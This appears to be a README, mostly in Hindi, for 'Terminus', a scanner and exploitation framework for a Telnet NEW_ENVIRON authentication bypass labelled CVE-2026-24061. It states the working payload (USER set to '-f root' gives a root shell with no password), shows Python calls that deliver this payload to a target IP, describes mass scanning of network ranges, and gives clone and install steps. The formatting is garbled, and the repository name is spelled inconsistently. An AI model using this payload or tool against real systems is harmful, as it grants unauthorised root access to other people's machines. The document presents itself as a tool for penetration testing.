
AsyncIO स्कैनर और CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass) के लिए शोषण फ्रेमवर्क। इसमें उच्च-समवर्ती खोज, निष्क्रिय फिंगरप्रिंटिंग, और अधिकृत रूट शेल एस्केलेशन शामिल है।
CVE-2026-24061 Telnet NEW_ENVIRON प्रमाणीकरण बायपास और विशेषाधिकार वृद्धि भेद्यता के लिए एक सुरक्षा विश्लेषण इंजन।

Terminus एक व्यावसायिक सुरक्षा अनुसंधान उपकरण है जिसे CVE-2026-24061 के अधिकृत पेनेट्रेशन टेस्टिंग और भेद्यता मूल्यांकन के लिए डिज़ाइन किया गया है। यह गंभीर भेद्यता विरासती Telnet डेमन कार्यान्वयन को प्रभावित करती है, जिससे अप्रमाणित दूरस्थ हमलावर प्रमाणीकरण को बायपास कर रूट-स्तरीय पहुँच प्राप्त कर सकते हैं।
CVE-2026-24061 उन Telnet सेवाओं में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है जो RFC 1572 (Telnet पर्यावरण विकल्प) का समर्थन करती हैं। यह भेद्यता NEW_ENVIRON सबनेगोशिएशन के दौरान USER पर्यावरण चर के अनुचित सैनिटाइज़ेशन का शोषण करती है:
USER=john → पासवर्ड के लिए संकेत देता हैUSER=-f root → प्रमाणीकरण बायपास करता है, रूट शेल प्रदान करता हैप्रभाव:
प्रभावित सेवाएँ:
192.168.0.0/24, 10.0.0.0/8)--verify): शोषण का प्रमाण, uid=0 रूट पहुँच की पुष्टि करता हैTerminus.handshake() - RFC 854 अनुरूप हैंडशेकTerminus.exploit() - CVE-2026-24061 पेलोड डिलीवरी--exploit फ्लैग की आवश्यकता होती हैTerminus का हृदय TerminusNegotiator क्लास है, जो प्रोटोकॉल हैंडलिंग और शोषण तर्क के बीच एक स्वच्छ पृथक्करण प्रदान करता है:```python
from terminus import TerminusNegotiator
negotiator = TerminusNegotiator()
await negotiator.handshake(target="192.168.1.100", port=23)
result = await negotiator.exploit(payload="-f root")
if result.success: print(f"Root shell acquired: {result.evidence['uid']}")
### इंजन बनाम स्क्रिप्ट दृष्टिकोण
**पारंपरिक स्क्रिप्ट** (मौजूदा उपकरण):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell
टर्मिनस इंजन:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report
---
## स्थापना
### आवश्यकताएँ
- **Python 3.10+**
- **समर्थित प्लेटफ़ॉर्म:**
- Windows 10/11 (PowerShell)
- Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
- नेटिव Linux (Kali, Parrot, Ubuntu, Debian)
- macOS (Python 3.10+ के साथ)
### त्वरित प्रारंभ (सभी प्लेटफ़ॉर्म)
#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
# Run setup script
.\setup_env.ps1
# Activate virtual environment
.venv\Scripts\Activate.ps1
# Verify installation
terminus --version
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406
chmod +x setup_env.sh ./setup_env.sh
source venv/bin/activate
terminus --version
#### मैन्युअल इंस्टॉलेशन (सभी प्लेटफ़ॉर्म)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406
# Create virtual environment
python3 -m venv venv
# Activate (Linux/macOS/WSL)
source venv/bin/activate
# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1
# Install dependencies
pip install -e .